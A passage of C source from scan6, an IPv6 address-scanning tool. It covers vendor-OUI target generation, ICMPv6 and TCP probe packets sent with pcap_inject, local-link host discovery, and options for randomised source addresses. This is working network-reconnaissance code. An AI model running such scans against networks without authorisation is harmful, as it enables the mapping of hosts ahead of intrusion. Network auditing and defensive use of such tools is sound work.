perror("scan6:"); return(0); } while( ouis <= MAX_IEEE_OUIS && fgets(line, MAX_IEEE_OUIS_LINE_SIZE, fp) != NULL){ /* We ship a minimalistic IEEE OUI "database" containing only the first "line" for each IEEE OUI. However, in order to handle the case of users employing the OUI database directly downloaded from the IEEE site, we perform a simple check to skip those lines that do not start with the pattern XX-XX-XX */ if( (lines=Strnlen(line, MAX_IEEE_OUIS_LINE_SIZE)) <= 9) continue; if(line[2] != '-' || line[5] != '-' || line[8] != ' ') continue; charptr= (char *)line + 9; /* Skip any whitespaces */ while(charptr < ( (char *)line + lines) && *charptr == ' ') charptr++; /* The database we ship contains the complete first line for each OUI, which includes the string "(hex)". If we find that string, we should skip it. */ if( (( (char *)line + lines) - charptr) >= OUI_HEX_STRING_SIZE){ /* If we find the "(hex)" string, we must skip it */ if( bcmp(oui_hex_string, charptr, OUI_HEX_STRING_SIZE) == 0) charptr+= OUI_HEX_STRING_SIZE; /* Now we mst skip any whitespaces between the "(hex)" string and the vendor name */ while(charptr < ( (char *)line + lines) && *charptr == ' ') charptr++; if(charptr >= ( (char *)line + lines)) continue; } if(match_strings(vendor, charptr)){ /* Copy the actual OUI to our array */ bcopy(line, oui_ascii, 8); /* Patch the dashes with colons (i.e., s/-/:/ */ oui_ascii[2]=':'; oui_ascii[5]=':'; /* zero-terminate the string */ oui_ascii[8]= 0; strncat(oui_ascii, oui_end, ETHER_ADDR_PLEN-Strnlen(oui_ascii, sizeof(oui_ascii))-1); if(ether_pton(oui_ascii, &oui_list[ouis], sizeof(oui_list[ouis])) == 0){ if(verbose_f) puts("scan6: ether_pton(): Error converting Ethernet Address to presentation format"); return(0); } ouis++; } } if(ferror(fp)){ if(verbose_f) perror("scan6:"); return(0); } fclose(fp); /* * If the target is a list of IEEE OUIs, we want to start trying from the newest OUIs, * to the older OUIs. The older OUIs are left for the end, since they have probably been * used for NICs used by legacy systems that are no longer online. Similarly, the very * newest OUI is left for the end, since it has probably not been used (yet) for any * commercialized Network Interface cards. */ if(sort_ouis_f && ouis >= 4){ aux_oui= oui_list[ouis-1]; for(i=ouis-2; i>=1; i--){ oui_list[i+1]= oui_list[i]; } oui_list[1] = aux_oui; } if(ouis == 0){ if(verbose_f) puts("scan6: Couldn't find any IEEE OUI for the target vendor"); return(0); } /* We walk the IEEE OUI list backwards: from newer to older OUIs */ for(i=ouis-1; i>=0; i--){ if(scan->ntarget >= scan->maxtarget) return(0); if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } generate_slaac_address(&(dst->start), &oui_list[i], &((scan->target[scan->ntarget])->start)); (scan->target[scan->ntarget])->cur= (scan->target[scan->ntarget])->start; generate_slaac_address(&(dst->end), &oui_list[i], &((scan->target[scan->ntarget])->end)); /* The three low-order bytes must vary from 0x000000 to 0xffffff */ (scan->target[scan->ntarget])->end.s6_addr16[6]= (scan->target[scan->ntarget])->end.s6_addr16[6] | htons(0x00ff); (scan->target[scan->ntarget])->end.s6_addr16[7]= (scan->target[scan->ntarget])->end.s6_addr16[6] | htons(0xffff); scan->ntarget++; } return(1); } /* * Function: match_strings() * * Checks whether one string "matches" within another string */ int match_strings(char *buscar, char *buffer){ unsigned int buscars, buffers; unsigned int i=0, j=0; buscars= Strnlen(buscar, MAX_IEEE_OUIS_LINE_SIZE); buffers= Strnlen(buffer, MAX_IEEE_OUIS_LINE_SIZE); if(buscars > buffers) return(0); while(i <= (buffers - buscars)){ j=0; while(j < buscars){ if(toupper((int) ((unsigned char)buscar[j])) != toupper((int) ((unsigned char)buffer[i+j]))) break; j++; } if(j >= buscars) return(1); i++; } return(0); } /* * Function: load_bruteforce_entries() * * Converts a target prefix to scan_entry format */ int load_bruteforce_entries(struct scan_list *scan, struct scan_entry *dst){ if(scan->ntarget >= scan->maxtarget) return(0); if( (scan->target[scan->ntarget]= malloc(sizeof(struct scan_entry))) == NULL){ if(verbose_f) puts("scans: malloc(): Not enough memory"); return(0); } *scan->target[scan->ntarget]= *dst; scan->ntarget++; return(1); } /* * Function: prefix_to_scan() * * Converts a target prefix to scan_entry format */ void prefix_to_scan(struct prefix_entry *pref, struct scan_entry *scan){ u_int16_t mask; u_int8_t words; unsigned int i; sanitize_ipv6_prefix(&(pref->ip6), pref->len); scan->start= pref->ip6; scan->cur= scan->start; words= pref->len/16; for(i=0; i< words; i++) (scan->end).s6_addr16[i]= (pref->ip6).s6_addr16[i]; for(i= (words+1); i<8; i++){ (scan->end).s6_addr16[i]= htons(0xffff); } mask=0xffff; for(i=0; i< (pref->len % 16); i++) mask= mask>>1; (scan->end).s6_addr16[words]= (scan->start).s6_addr16[words] | htons(mask); } /* * Function: usage() * * Prints the syntax of the scan6 tool */ void usage(void){ puts("usage: scan6 -i INTERFACE (-L | -d) [-s SRC_ADDR[/LEN] | -f] \n" " [-S LINK_SRC_ADDR | -F] [-p PROBE_TYPE] [-Z PAYLOAD_SIZE] [-o SRC_PORT]\n" " [-a DST_PORT] [-X TCP_FLAGS] [-P ADDRESS_TYPE] [-q] [-e] [-t]\n" " [-x RETRANS] [-o TIMEOUT] [-V VM_TYPE] [-b] [-B ENCODING] [-g]\n" " [-k IEEE_OUI] [-K VENDOR] [-m PREFIXES_FILE] [-w IIDS_FILE] [-W IID]\n" " [-Q IPV4_PREFIX[/LEN]] [-T] [-I INC_SIZE] [-r RATE(bps|pps)] [-l]\n" " [-z SECONDS] [-c CONFIG_FILE] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the scan6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts( "scan6: An advanced IPv6 Address Scanning tool\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Range or Prefix\n" " --prefixes-file, -m Prefixes file\n" " --link-src-address, -S Link-layer Destination Address\n" " --probe-type, -p Probe type {echo, unrec, all}\n" " --payload-size, -Z TCP/UDP Payload Size\n" " --src-port, -o TCP/UDP Source Port\n" " --dst-port, -a TCP/UDP Destination Port\n" " --tcp-flags, -X TCP Flags\n" " --print-type, -P Print address type {local, global, all}\n" " --print-unique, -q Print only one IPv6 addresses per Ethernet address\n" " --print-link-addr, -e Print link-layer addresses\n" " --print-timestamp, -t Print timestamp for each alive node\n" " --retrans, -x Number of retransmissions of each probe\n" " --timeout, -O Timeout in seconds (default: 1 second)\n" " --local-scan, -L Scan the local subnet\n" " --rand-src-addr, -f Randomize the IPv6 Source Address\n" " --rand-link-src-addr, -F Randomize the Ethernet Source Address\n" " --tgt-virtual-machines, -V Target virtual machines\n" " --tgt-low-byte, -b Target low-byte addresses\n" " --tgt-ipv4, -B Target embedded-IPv4 addresses\n" " --tgt-port, -g Target embedded-port addresses\n" " --tgt-ieee-oui, -k Target IPv6 addresses embedding IEEE OUI\n" " --tgt-vendor, -K Target IPv6 addresses for vendor's IEEE OUIs\n" " --tgt-iids-file, -w Target Interface IDs (IIDs) in specified file\n" " --tgt-iid, -W Target Interface IDs (IIDs)\n" " --ipv4-host, -Q Host IPv4 Address/Prefix\n" " --sort-ouis, -T Sort IEEE OUIs\n" " --inc-size, -I Increments size\n" " --rate-limit, -r Rate limit the address scan to specified rate\n" " --loop, -l Send periodic probes to the specified targets\n" " --sleep, -z Pause between periodic probes\n" " --config-file, -c Use alternate configuration file\n" " --help, -h Print help for the scan6 tool\n" " --verbose, -v Be verbose\n" "\n" " Programmed by Fernando Gont for SI6 Networks \n" " Please send any bug reports to \n" ); } /* * Function: send_probe_remote() * * Sends a probe packet to a remote target */ int send_probe_remote(struct iface_data *idata, struct scan_list *scan, struct in6_addr *srcaddr, unsigned char type){ unsigned char *ptr; unsigned int i; struct ether_header *ether; struct dlt_null *dlt_null; unsigned char *v6buffer; struct ip6_hdr *ipv6; struct tcp_hdr *tcp; struct ip6_dest *destopth; struct ip6_option *opt; u_int32_t *uint32; /* max_packet_size holds is equal to the link MTU, since the tool doesn't support packets larger than the link MTU */ max_packet_size = idata->mtu; ether = (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB && !loopback_f){ ether->src = idata->ether; if(!onlink_f){ ether->dst = idata->nhhaddr; }else{ if(ipv6_to_ether(idata->pfd, idata, &(scan->target[scan->ctarget])->cur, &(idata->hdstaddr)) != 1){ return(1); } } ether->ether_type = htons(ETHERTYPE_IPV6); } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= idata->srcaddr_f?(*srcaddr):*sel_src_addr_ra(idata, &((scan->target[scan->ctarget])->cur)); ipv6->ip6_dst= (scan->target[scan->ctarget])->cur; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; switch(type){ case PROBE_ICMP6_ECHO: *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct icmp6_hdr)+ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+idata->mtu)){ if(idata->verbose_f>1) puts("Packet too large while creating ICMPv6 Echo Request Probe packet"); return(-1); } icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(0); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); icmp6->icmp6_cksum = 0; icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); break; case PROBE_UNREC_OPT: *prev_nh = IPPROTO_DSTOPTS; if( (ptr+sizeof(struct icmp6_hdr) + 8 + ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+idata->mtu)){ if(idata->verbose_f>1) puts("Packet too large while creating Unrec. Opt. Probe Packet"); return(-1); } destopth = (struct ip6_dest *) ptr; destopth->ip6d_len= 0; destopth->ip6d_nxt= IPPROTO_ICMPV6; ptr= ptr + 2; opt= (struct ip6_option *) ptr; opt->ip6o_type= 0x80; opt->ip6o_len= 4; ptr= ptr + 2; uint32 = (u_int32_t *) ptr; *uint32 = random(); ptr= ptr +4; icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(0); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); icmp6->icmp6_cksum = 0; icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); break; case PROBE_TCP: *prev_nh = IPPROTO_TCP; if( (ptr+sizeof(struct tcp_hdr)) > (v6buffer + max_packet_size)){ if(idata->verbose_f) puts("Packet Too Large while inserting TCP header"); return(0); } tcp = (struct tcp_hdr *) ptr; bzero(tcp, sizeof(struct tcp_hdr)); if(srcport_f) tcp->th_sport= htons(srcport); else tcp->th_sport= htons(1024+ rand() % 64512); if(dstport_f) tcp->th_dport= htons(dstport); else tcp->th_dport= htons(1+ rand() % 1024); if(tcpflags_f) tcp->th_flags= tcpflags; else tcp->th_flags= TH_ACK; if(tcpflags & TH_ACK) tcp->th_ack= htonl(rand()); else tcp->th_ack= htonl(0); tcp->th_win= htons( 4096 * (rand() % 9 + 1)); /* Current version of tcp6 does not support sending TCP options */ tcp->th_off= sizeof(struct tcp_hdr) >> 2; ptr+= tcp->th_off << 2; if( (ptr + rhbytes) > v6buffer+max_packet_size){ puts("Packet Too Large while inserting TCP segment"); exit(EXIT_FAILURE); } while(rhbytes>=4){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); rhbytes -= sizeof(u_int32_t); } while(rhbytes>0){ *(u_int8_t *) ptr= (u_int8_t) random(); ptr++; rhbytes--; } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); tcp->th_sum = 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); break; } if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f>1) printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(0); } if(nw != (ptr-buffer)){ if(idata->verbose_f>1) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); return(0); } return(1); } /* * Function: multi_scan_local() * * Performs an IPv6 address scan on a local link */ int multi_scan_local(pcap_t *pfd, struct iface_data *idata, struct in6_addr *srcaddr, unsigned char type, \ const char *ptargetaddr, struct host_list *hlist){ struct bpf_program pcap_filter; struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct ip6_hdr *pkt_ipv6; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; unsigned char *pkt_end; unsigned char *ptr; unsigned char buffer[65556]; unsigned int icmp6_max_packet_size; struct ether_header *ether; unsigned char *v6buffer; struct ip6_hdr *ipv6; volatile unsigned int tries=0; struct in6_addr targetaddr; struct sigaction new_sig, old_sig; struct ip6_dest *destopth; struct ip6_option *opt; u_int32_t *uint32; unsigned char error_f=FALSE, llocalsrc_f=FALSE; int result; icmp6_max_packet_size = idata->mtu; ether = (struct ether_header *) buffer; v6buffer = buffer + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; if ( inet_pton(AF_INET6, ptargetaddr, &targetaddr) <= 0){ if(idata->verbose_f>1) puts("inet_pton(): Source Address not valid"); return(-1); } if(IN6_IS_ADDR_LINKLOCAL(srcaddr)) llocalsrc_f=TRUE; if(pfd == NULL) return(-1); switch(type){ case PROBE_ICMP6_ECHO: if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_ERNS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f>1) printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } break; case PROBE_UNREC_OPT: if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_ERRORNS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f>1) printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } break; default: return(-1); break; } if(pcap_setfilter(pfd, &pcap_filter) == -1){ if(idata->verbose_f>1) printf("pcap_setfilter(): %s", pcap_geterr(pfd)); return(-1); } pcap_freecode(&pcap_filter); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= *srcaddr; ipv6->ip6_dst= targetaddr; ether->src = idata->ether; ether->dst = ether_multicast(&(ipv6->ip6_dst)); ether->ether_type = htons(ETHERTYPE_IPV6); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; switch(type){ case PROBE_ICMP6_ECHO: *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct icmp6_hdr)+ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+icmp6_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while creating ICMPv6 Echo Request Probe packet"); return(-1); } icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = random(); icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); } break; case PROBE_UNREC_OPT: *prev_nh = IPPROTO_DSTOPTS; if( (ptr+sizeof(struct icmp6_hdr) + 8 + ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+icmp6_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while creating Unrec. Opt. Probe Packet"); return(-1); } destopth = (struct ip6_dest *) ptr; destopth->ip6d_len= 0; destopth->ip6d_nxt= IPPROTO_ICMPV6; ptr= ptr + 2; opt= (struct ip6_option *) ptr; opt->ip6o_type= 0x80; opt->ip6o_len= 4; ptr= ptr + 2; uint32 = (u_int32_t *) ptr; *uint32 = random(); ptr= ptr +4; icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = random(); icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); } break; } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); icmp6->icmp6_cksum = 0; icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); /* We set the signal handler, and the anchor for siglongjump() */ canjump=0; bzero(&new_sig, sizeof(struct sigaction)); sigemptyset(&new_sig.sa_mask); new_sig.sa_handler= &local_sig_alarm; if( sigaction(SIGALRM, &new_sig, &old_sig) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(sigsetjmp(env, 1) != 0) tries++; canjump=1; while(tries <= idata->local_retrans && !error_f){ if((nw=pcap_inject(pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f>1) printf("pcap_inject(): %s\n", pcap_geterr(pfd)); error_f=TRUE; break; } if(nw != (ptr-buffer)){ if(idata->verbose_f>1) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); error_f=TRUE; break; } alarm(idata->local_timeout); while( (hlist->nhosts < hlist->maxhosts) && !error_f){ do{ if((result=pcap_next_ex(pfd, &pkthdr, &pktdata)) == -1){ if(idata->verbose_f>1) printf("pcap_next_ex(): %s", pcap_geterr(pfd)); error_f=TRUE; break; } }while(result==0); if(error_f) break; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (ETHER_HDR_LEN + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ if(pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; if(is_eq_in6_addr(&(pkt_ns->nd_ns_target), srcaddr) || \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata->ip6_local))){ if(send_neighbor_advert(idata, pfd, pktdata) == -1){ error_f=TRUE; break; } } } else if( (pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) || (pkt_icmp6->icmp6_type == ICMP6_PARAM_PROB)){ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; /* If the Source Address was a link-local address, we only want link-local addresses. OTOH, if the Source Address was a global address, we only want global addresses. */ if(llocalsrc_f){ if(!IN6_IS_ADDR_LINKLOCAL(&(pkt_ipv6->ip6_src))) continue; } else{ if(IN6_IS_ADDR_LINKLOCAL(&(pkt_ipv6->ip6_src))) continue; } if(valid_icmp6_response(idata, type, pkthdr, pktdata, buffer)){ if(is_ip6_in_list(&(pkt_ipv6->ip6_src), hlist)) continue; if( (hlist->host[hlist->nhosts]= malloc(sizeof(struct host_entry))) == NULL){ if(idata->verbose_f>1) puts("Error when allocating memory for host data"); error_f=TRUE; break; } bzero(hlist->host[hlist->nhosts], sizeof(struct host_entry)); (hlist->host[hlist->nhosts])->ip6= pkt_ipv6->ip6_src; (hlist->host[hlist->nhosts])->ether= pkt_ether->src; (hlist->host[hlist->nhosts])->flag = VALID_MAPPING; (hlist->nhosts)++; } } } } /* Processing packets */ } /* Resending Neighbor Solicitations */ if( sigaction(SIGALRM, &old_sig, NULL) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); error_f=TRUE; } if(error_f) return(-1); else return 0; } /* * Function: find_local_globals() * * Finds Global Unicast Addresses present on the local link */ int find_local_globals(pcap_t *pfd, struct iface_data *idata, unsigned char type, const char *ptargetaddr, \ struct host_list *hlist){ unsigned int i; for(i=0; i < idata->ip6_global.nprefix; i++){ if(multi_scan_local(pfd, idata, &((idata->ip6_global.prefix[i])->ip6), type, ALL_NODES_MULTICAST_ADDR,\ hlist) == -1){ return(-1); } } return 0; } /* * Function: host_scan_local() * * Scans a single IPv6 address */ int host_scan_local(pcap_t *pfd, struct iface_data *idata, struct in6_addr *srcaddr, unsigned char type, struct host_entry *host){ struct bpf_program pcap_filter; struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct ip6_hdr *pkt_ipv6; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; unsigned char *pkt_end; volatile unsigned char *ptr; unsigned char buffer[65556]; unsigned int icmp6_max_packet_size; struct ether_header *ether; unsigned char *v6buffer; struct ip6_hdr *ipv6; volatile unsigned int tries=0; struct in6_addr targetaddr; struct sigaction new_sig, old_sig; struct ip6_dest *destopth; struct ip6_option *opt; u_int32_t *uint32; unsigned char foundaddr_f=FALSE, error_f=FALSE; int result; icmp6_max_packet_size = idata->mtu; ether = (struct ether_header *) buffer; v6buffer = buffer + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; targetaddr= host->ip6; if( pcap_datalink(pfd) != DLT_EN10MB){ if(idata->verbose_f>1) printf("Error: Interface %s is not an Ethernet interface", idata->iface); return(-1); } switch(type){ case PROBE_ICMP6_ECHO: if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_ERNS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f>1) printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } break; case PROBE_UNREC_OPT: if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_ERRORNS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ if(idata->verbose_f>1) printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } break; default: return(-1); break; } if(pcap_setfilter(pfd, &pcap_filter) == -1){ if(idata->verbose_f>1) printf("pcap_setfilter(): %s", pcap_geterr(pfd)); return(-1); } pcap_freecode(&pcap_filter); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_dst= targetaddr; ipv6->ip6_src= *srcaddr; ether->src = idata->ether; ether->dst = host->ether; ether->ether_type = htons(ETHERTYPE_IPV6); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; switch(type){ case PROBE_ICMP6_ECHO: *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct icmp6_hdr)+ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+icmp6_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while creating ICMPv6 Echo Request Probe packet"); return(-1); } icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = random(); icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); } break; case PROBE_UNREC_OPT: *prev_nh = IPPROTO_DSTOPTS; if( (ptr+sizeof(struct icmp6_hdr) + 8 + ICMPV6_ECHO_PAYLOAD_SIZE) > (v6buffer+icmp6_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while creating Unrec. Opt. Probe Packet"); return(-1); } destopth = (struct ip6_dest *) ptr; destopth->ip6d_len= 0; destopth->ip6d_nxt= IPPROTO_ICMPV6; ptr= ptr + 2; opt= (struct ip6_option *) ptr; opt->ip6o_type= 0x80; opt->ip6o_len= 4; ptr= ptr + 2; uint32 = (u_int32_t *) ptr; *uint32 = random(); ptr= ptr +4; icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = random(); icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr = ptr+ sizeof(struct icmp6_hdr); for(i=0; i<(ICMPV6_ECHO_PAYLOAD_SIZE>>2); i++){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); } break; } ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); icmp6->icmp6_cksum = 0; icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); /* We set the signal handler, and the anchor for siglongjump() */ canjump=0; bzero(&new_sig, sizeof(struct sigaction)); sigemptyset(&new_sig.sa_mask); new_sig.sa_handler= &local_sig_alarm; if( sigaction(SIGALRM, &new_sig, &old_sig) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); return(-1); } if(sigsetjmp(env, 1) != 0) tries++; canjump=1; while(tries<= idata->local_retrans && !foundaddr_f && !error_f){ if((nw=pcap_inject(pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f>1) printf("pcap_inject(): %s\n", pcap_geterr(pfd)); error_f=TRUE; break; } if(nw != (ptr-buffer)){ if(idata->verbose_f>1) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); error_f=TRUE; break; } alarm(idata->local_timeout); foundaddr_f=FALSE; while(!foundaddr_f && !error_f){ do{ if( (result=pcap_next_ex(pfd, &pkthdr, &pktdata)) == -1){ if(idata->verbose_f>1) printf("pcap_next_ex(): %s", pcap_geterr(pfd)); error_f=TRUE; break; } }while(result==0); if(error_f) break; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (ETHER_HDR_LEN + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); if(pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; if(is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata->ip6_local)) || \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), srcaddr)){ if(send_neighbor_advert(idata, pfd, pktdata) == -1){ error_f=TRUE; break; } } } else if( (pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) || (pkt_icmp6->icmp6_type == ICMP6_PARAM_PROB)){ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; if(valid_icmp6_response(idata, type, pkthdr, pktdata, buffer)){ host->ether= pkt_ether->src; host->flag = VALID_MAPPING; foundaddr_f=TRUE; break; } } } } /* Processing packets */ } /* Resending Probe packet */ if( sigaction(SIGALRM, &old_sig, NULL) == -1){ if(idata->verbose_f>1) puts("Error setting up 'Alarm' signal"); error_f=TRUE; } if(error_f) return(-1); else return 0; } /* * Function: print_host_entries() * * Prints the IPv6 addresses (and optionally the Ethernet addresses) in a list */ int print_host_entries(struct host_list *hlist, unsigned char flag){ unsigned int i; for(i=0; i < (hlist->nhosts); i++){ if(inet_ntop(AF_INET6, &((hlist->host[i])->ip6), pv6addr, sizeof(pv6addr)) == NULL){ if(verbose_f>1) puts("inet_ntop(): Error converting IPv6 address to presentation format"); return(-1); } if(flag == PRINT_ETHER_ADDR){ if(ether_ntop( &((hlist->host[i])->ether), plinkaddr, sizeof(plinkaddr)) == 0){ if(verbose_f>1) puts("ether_ntop(): Error converting address"); return(-1); } printf("%s @ %s\n", pv6addr, plinkaddr); } else printf("%s\n", pv6addr); } return 0; } /* * Function: print_unique_host_entries() * * Prints only one IPv6 address (and optionally the Ethernet addresses) per Ethernet * address in a list. */ int print_unique_host_entries(struct host_list *hlist, unsigned char flag){ unsigned int i, j, k; for(i=0; i < (hlist->nhosts); i++){ if(i){ for(j=0; j < i; j++){ for(k=0; k < ETH_ALEN; k++){ if((hlist->host[i])->ether.a[k] != 